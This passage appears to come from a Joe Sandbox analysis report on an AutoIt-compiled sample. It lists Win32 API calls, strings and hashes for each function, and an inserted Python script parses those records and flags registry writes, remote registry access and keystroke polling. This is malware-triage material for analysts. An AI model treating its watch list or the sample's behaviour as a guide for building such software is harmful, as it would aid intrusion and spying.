                                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0041B8DD
                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 0041B90E
                                                                                • _memset.LIBCMT ref: 0041B933
                                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0041B97C
                                                                                • _memset.LIBCMT ref: 0041B9DB
                                                                                • SendMessageW.USER32 ref: 0041BA05
                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 0041BA5D
                                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 0041BB0A
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0041BB2C
                                                                                • GetMenuItemInfoW.USER32(?), ref: 0041BB76
                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0041BBA3
                                                                                • DrawMenuBar.USER32(?), ref: 0041BBB2
                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 0041BBDA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                • String ID: 0
                                                                                • API String ID: 1073566785-4108050209
                                                                                • Opcode ID: 44b38c68797b39df52b28475de959af4bf3fb2b5744858224ecb6140b67cb034
                                                                                • Instruction ID: bc615952a08911dd10fdc96788323da12bfe750327d8fd426dab88ec870fc065
                                                                                • Opcode Fuzzy Hash: 44b38c68797b39df52b28475de959af4bf3fb2b5744858224ecb6140b67cb034
                                                                                • Instruction Fuzzy Hash: DFE1D071900208ABDF119F65DC84EEF7B78FF04714F10815BF929AA290D7789A82CFA5
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Foreground
                                                                                • String ID: ACTIVE$ALL$CLASS$H+F$HANDLE$INSTANCE$L+F$LAST$P+F$REGEXPCLASS$REGEXPTITLE$T+F$TITLE
                                                                                • API String ID: 62970417-2709185334
                                                                                • Opcode ID: 49e482766ec54c44d04fdeffa56860d3f29a1e13fa9ec0adae0d8666d3468099
                                                                                • Instruction ID: 32f0e2a164ae5808a8a1e32085909f1a0b2ff264b05597946bfdc2c8f14921b1
                                                                                • Opcode Fuzzy Hash: 49e482766ec54c44d04fdeffa56860d3f29a1e13fa9ec0adae0d8666d3468099
                                                                                • Instruction Fuzzy Hash: F4D11A30204642FBC705DF20D641AABBBB0FF54304F408A1EF5559B6A1DBB8F95ACB96
                                                                                APIs
                                                                                • GetCursorPos.USER32(?), ref: 0041778A
                                                                                • GetDesktopWindow.USER32 ref: 0041779F
                                                                                • GetWindowRect.USER32(00000000), ref: 004177A6
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00417808
                                                                                • DestroyWindow.USER32(?), ref: 00417834
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0041785D
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0041787B
                                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 004178A1
                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 004178B6
                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004178C9
                                                                                • IsWindowVisible.USER32(?), ref: 004178E9
                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00417904
                                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00417918
                                                                                • GetWindowRect.USER32(?,?), ref: 00417930
                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00417956
                                                                                • GetMonitorInfoW.USER32 ref: 00417970
                                                                                • CopyRect.USER32(?,?), ref: 00417987
                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 004179F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                • String ID: ($0$tooltips_class32
                                                                                • API String ID: 698492251-4156429822
                                                                                • Opcode ID: e58aa6b9ba1d811dcb9146000b0296332d4ffda661191374c5a773b5dbe1d390
                                                                                • Instruction ID: 90815065edb2fb40db6971abdf0802a45102ca11b615d8f0c19be9f6ddb397bc
                                                                                • Opcode Fuzzy Hash: e58aa6b9ba1d811dcb9146000b0296332d4ffda661191374c5a773b5dbe1d390
                                                                                • Instruction Fuzzy Hash: CEB19D71608300AFDB04DF64C949BAABBF5FF88314F00891EF5999B291D774E845CB9A
                                                                                APIs
                                                                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 003F6CFB
                                                                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003F6D21
                                                                                • _wcscpy.LIBCMT ref: 003F6D4F
                                                                                • _wcscmp.LIBCMT ref: 003F6D5A
                                                                                • _wcscat.LIBCMT ref: 003F6D70
                                                                                • _wcsstr.LIBCMT ref: 003F6D7B
                                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 003F6D97
                                                                                • _wcscat.LIBCMT ref: 003F6DE0
                                                                                • _wcscat.LIBCMT ref: 003F6DE7
                                                                                • _wcsncpy.LIBCMT ref: 003F6E12
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                • API String ID: 699586101-1459072770
                                                                                • Opcode ID: 1d9149ad50968d460b7b3d96307809f91d0a4b650be134c3800a0f273c3444ec
                                                                                • Instruction ID: ed52a5b464de1e5effb49c556aa8f4037a8d489623042e8b4d3870df32581dd0
                                                                                • Opcode Fuzzy Hash: 1d9149ad50968d460b7b3d96307809f91d0a4b650be134c3800a0f273c3444ec
                                                                                • Instruction Fuzzy Hash: 9B41D772A00214BBE716BB64DD47FBF777CEF51710F14006AFA01EA282EB74DA0196A5
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003CA939
                                                                                • GetSystemMetrics.USER32(00000007), ref: 003CA941
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003CA96C
                                                                                • GetSystemMetrics.USER32(00000008), ref: 003CA974
                                                                                • GetSystemMetrics.USER32(00000004), ref: 003CA999
                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 003CA9B6
                                                                                • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 003CA9C6
                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 003CA9F9
                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 003CAA0D
                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 003CAA2B
                                                                                • GetStockObject.GDI32(00000011), ref: 003CAA47
                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 003CAA52
                                                                                  • Part of subcall function 003CB63C: GetCursorPos.USER32(000000FF), ref: 003CB64F
                                                                                  • Part of subcall function 003CB63C: ScreenToClient.USER32(00000000,000000FF), ref: 003CB66C
                                                                                  • Part of subcall function 003CB63C: GetAsyncKeyState.USER32(00000001), ref: 003CB691
                                                                                  • Part of subcall function 003CB63C: GetAsyncKeyState.USER32(00000002), ref: 003CB69F
                                                                                • SetTimer.USER32(00000000,00000000,00000028,003CAB87), ref: 003CAA79
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                • String ID: AutoIt v3 GUI
                                                                                • API String ID: 1458621304-248962490
                                                                                • Opcode ID: 6eba332e20c3fd53923ce1bf61ba051d32b6032547fcb308ff37f2a12aefacf3
                                                                                • Instruction ID: 3873e3b00e383e986b438c2f6df6c9fc681e8e562f00b7cb7aa07258c8929f32
                                                                                • Opcode Fuzzy Hash: 6eba332e20c3fd53923ce1bf61ba051d32b6032547fcb308ff37f2a12aefacf3
                                                                                • Instruction Fuzzy Hash: 2CB14C75A0020AAFDB15DFA8DC46FAE7BB4FB08314F114229FA15E62A0DB749C41CB59
                                                                                APIs
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00413735
                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,0044DC00,00000000,?,00000000,?,?), ref: 004137A3
                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004137EB
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00413874
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00413B94
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00413BA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                • API String ID: 536824911-966354055
                                                                                • Opcode ID: 06ce6629ed61712d2e3dc99a974dd338f1e33fae0041bd5a4bb11d17f4553433
                                                                                • Instruction ID: 812224f3a980806d77a56b817e9143a7d17883c4c0a337b71f42d977f0424e5a
                                                                                • Opcode Fuzzy Hash: 06ce6629ed61712d2e3dc99a974dd338f1e33fae0041bd5a4bb11d17f4553433
                                                                                • Instruction Fuzzy Hash: 800289756046019FCB15EF24C841E6AB7E5FF88724F04845EFA8A9B3A2DB34ED41CB85
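When a report like this one carries thousands of these per-function records, it helps to turn the "APIs" bullets into structured data and to pivot on them rather than read them by eye. The script below is an added example written for this page; it is not part of the Joe Sandbox report or of the sandbox's tooling. It parses the bullet format shown above (API.MODULE(args), ref: address, with the optional "Part of subcall function" prefix), and rebuilds the "API ID" string from the "Similarity" section so that records can be matched across reports. The rebuild rule (split each name into camel-case words, drop a fixed stop list, group words by frequency, join groups with "$") is inferred from the API ID values visible on this page and reproduces the registry-write record (Close$ConnectCreateRegistryValue) and the file-version record above; it is not Joe Sandbox's documented algorithm and may differ for names this page does not contain. The WATCH table of APIs worth flagging is an assumption chosen for illustration; the two embedded records are copied from the listings above as constructed test input.

```python
import re
from collections import Counter

# Two records copied from the "APIs" listings above (the RegWrite-style function
# whose first call is at 00413735 and the file-version function at 003F6CFB),
# embedded as constructed test input so the script runs offline.
REGISTRY_RECORD = r"""
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00413735
• RegCreateKeyExW.ADVAPI32(?,?,00000000,0044DC00,00000000,?,00000000,?,?), ref: 004137A3
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004137EB
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00413874
• RegCloseKey.ADVAPI32(?), ref: 00413B94
• RegCloseKey.ADVAPI32(00000000), ref: 00413BA1
Strings
"""

VERSION_RECORD = r"""
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 003F6CFB
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 003F6D21
• _wcscpy.LIBCMT ref: 003F6D4F
• _wcscmp.LIBCMT ref: 003F6D5A
• _wcscat.LIBCMT ref: 003F6D70
• _wcsstr.LIBCMT ref: 003F6D7B
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 003F6D97
• _wcscat.LIBCMT ref: 003F6DE0
• _wcscat.LIBCMT ref: 003F6DE7
• _wcsncpy.LIBCMT ref: 003F6E12
Strings
"""

# One bullet line of the report: optional "Part of subcall function XXXX:" prefix,
# then API.MODULE, optional (args), then "ref: ADDR".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Name fragments that the visible "API ID" values on this page never contain.
# This stop list is inferred from those values, not taken from Joe Sandbox.
STOP = {"Get", "Set", "Is", "Ex", "W", "A", "Reg", "Ver", "Key", "Pos", "To", "Dlg", "ID"}

# Hypothetical triage table (an assumption for this example): APIs that get a flag.
WATCH = {
    "registry_write": {"RegSetValueExW", "RegSetValueExA", "RegCreateKeyExW", "RegCreateKeyExA"},
    "remote_registry": {"RegConnectRegistryW", "RegConnectRegistryA"},
    "keystroke_poll": {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState"},
}


def parse_api_records(text):
    """Return one dict per bullet line; section headers such as 'APIs' are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": args.split(",") if args else [],
            "ref": int(m.group("ref"), 16),
            "subcall": m.group("sub"),  # None unless reported via a subcall
        })
    return calls


def api_words(name):
    """Split a Win32 name into camel-case words and drop the inferred stop words.
    CRT helpers such as _wcscat or __swprintf are kept as one word."""
    if name.startswith("_"):
        return [name]
    return [w for w in re.findall(r"[A-Z][a-z]+|[A-Z]+(?![a-z])|[a-z]+", name) if w not in STOP]


def api_id(calls):
    """Rebuild the report's 'API ID': words grouped by occurrence count, most
    frequent group first, words in ASCII order inside a group ('_' sorts after
    letters), groups joined with '$'."""
    counts = Counter(w for c in calls for w in api_words(c["api"]))
    groups = {}
    for word, n in counts.items():
        groups.setdefault(n, []).append(word)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


def summarize(text):
    """Per-function triage summary: first call address, module histogram,
    rebuilt API ID and the WATCH flags that fired."""
    calls = parse_api_records(text)
    return {
        "first_ref": calls[0]["ref"] if calls else None,
        "modules": dict(Counter(c["module"] for c in calls)),
        "api_id": api_id(calls),
        "flags": sorted({tag for c in calls for tag, names in WATCH.items() if c["api"] in names}),
    }


if __name__ == "__main__":
    for record in (REGISTRY_RECORD, VERSION_RECORD):
        print(summarize(record))
```

Feed it the text of a whole report section and split on the "APIs" header to get one summary per function; the rebuilt API ID then lets you join records from different reports of the same family even when the opcode hashes differ, because the Win32 import sequence of an AutoIt runtime function is far more stable than its bytes.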
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?), ref: 00416C56
                                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00416D16
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharMessageSendUpper
                                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                • API String ID: 3974292440-719923060
                                                                                • Opcode ID: df3ad9eb38b0712d19b6bed54dd6d42d1a84818b430ff14a7305d9d7f1a67e8f
                                                                                • Instruction ID: 807f143f8533ecce4effd69e2f23a34a94e0bc90dde37e4650c3aeb38caf62c0
                                                                                • Opcode Fuzzy Hash: df3ad9eb38b0712d19b6bed54dd6d42d1a84818b430ff14a7305d9d7f1a67e8f
                                                                                • Instruction Fuzzy Hash: B7A181302043419BCB15EF24C952AABB3A5BF84314F11896EF9569F3D2EB34EC46CB46
                                                                                APIs
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 003ECF91
                                                                                • __swprintf.LIBCMT ref: 003ED032
                                                                                • _wcscmp.LIBCMT ref: 003ED045
                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 003ED09A
                                                                                • _wcscmp.LIBCMT ref: 003ED0D6
                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 003ED10D
                                                                                • GetDlgCtrlID.USER32(?), ref: 003ED15F
                                                                                • GetWindowRect.USER32(?,?), ref: 003ED195
                                                                                • GetParent.USER32(?), ref: 003ED1B3
                                                                                • ScreenToClient.USER32(00000000), ref: 003ED1BA
                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 003ED234
                                                                                • _wcscmp.LIBCMT ref: 003ED248
                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 003ED26E
                                                                                • _wcscmp.LIBCMT ref: 003ED282
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                • String ID: %s%u
                                                                                • API String ID: 3119225716-679674701
                                                                                • Opcode ID: 58e53a7899553bb1771003a0acc777b839a2790d402587277d4f19eabe996470
                                                                                • Instruction ID: 36f250973049bbf3e825d2ea66174b224e7be65bdaf9bd2d67fc95e9fbcee420
                                                                                • Opcode Fuzzy Hash: 58e53a7899553bb1771003a0acc777b839a2790d402587277d4f19eabe996470
                                                                                • Instruction Fuzzy Hash: 38A1F531604356AFD716DF65D884FAAB7A8FF44314F008A2AFA69D61C0D730EA06CB91
                                                                                APIs
                                                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 003ED8EB
                                                                                • _wcscmp.LIBCMT ref: 003ED8FC
                                                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 003ED924
                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 003ED941
                                                                                • _wcscmp.LIBCMT ref: 003ED95F
                                                                                • _wcsstr.LIBCMT ref: 003ED970
                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 003ED9A8
                                                                                • _wcscmp.LIBCMT ref: 003ED9B8
                                                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 003ED9DF
                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 003EDA28
                                                                                • _wcscmp.LIBCMT ref: 003EDA38
                                                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 003EDA60
                                                                                • GetWindowRect.USER32(00000004,?), ref: 003EDAC9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                • String ID: @$ThumbnailClass
                                                                                • API String ID: 1788623398-1539354611
                                                                                • Opcode ID: 152ab641628a01252efb0e682ca0e03b01e0a544465fb4a44f540d809b0410b9
                                                                                • Instruction ID: 91b59e14f8b92cdb946156af3366699af6536a125b03623c2d1ed285c95b0608
                                                                                • Opcode Fuzzy Hash: 152ab641628a01252efb0e682ca0e03b01e0a544465fb4a44f540d809b0410b9
                                                                                • Instruction Fuzzy Hash: 3F81C2310083959FDB12DF11D881FAA7BE8EF84314F04466AFD899A0D6EB34DE45CBA1
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: __wcsnicmp
                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                • API String ID: 1038674560-1810252412
                                                                                • Opcode ID: 22df64b8fa5a8aa24e4487880b7887bd07e4effc4f6812f3a9fe581df988a4fb
                                                                                • Instruction ID: 56f2d690d4703e268e077677e508d16383187b6cdecbe6f2ceb8b0390aab95ec
                                                                                • Opcode Fuzzy Hash: 22df64b8fa5a8aa24e4487880b7887bd07e4effc4f6812f3a9fe581df988a4fb
                                                                                • Instruction Fuzzy Hash: A231DE32A04655B6EB16EF11DE43FED73689F20B44F30022AF541794D2FB95AA00C616
                                                                                APIs
                                                                                • LoadIconW.USER32(00000063), ref: 003EEAB0
                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 003EEAC2
                                                                                • SetWindowTextW.USER32(?,?), ref: 003EEAD9
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 003EEAEE
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 003EEAF4
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 003EEB04
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 003EEB0A
                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 003EEB2B
                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 003EEB45
                                                                                • GetWindowRect.USER32(?,?), ref: 003EEB4E
                                                                                • SetWindowTextW.USER32(?,?), ref: 003EEBB9
                                                                                • GetDesktopWindow.USER32 ref: 003EEBBF
                                                                                • GetWindowRect.USER32(00000000), ref: 003EEBC6
                                                                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 003EEC12
                                                                                • GetClientRect.USER32(?,?), ref: 003EEC1F
                                                                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 003EEC44
                                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 003EEC6F
                                                                                Similarity
                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                • String ID:
                                                                                • API String ID: 3869813825-0
                                                                                • Opcode ID: 717e6e99d18739ff3800109b3516c029b6124dbee4e68af671bee25279662da1
                                                                                • Instruction ID: cf7a847b51318f5e3dc349419e0ae746aabcdc586173336af89f171148acd6c8
                                                                                • Opcode Fuzzy Hash: 717e6e99d18739ff3800109b3516c029b6124dbee4e68af671bee25279662da1
                                                                                • Instruction Fuzzy Hash: 11517D7190074AEFDB21DFA9DD8AF6EBBF5FF04704F004A28E596A25A0D774A944CB04
                                                                                APIs
                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 004079C6
                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004079D1
                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 004079DC
                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 004079E7
                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 004079F2
                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 004079FD
                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 00407A08
                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 00407A13
                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 00407A1E
                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 00407A29
                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00407A34
                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 00407A3F
                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00407A4A
                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 00407A55
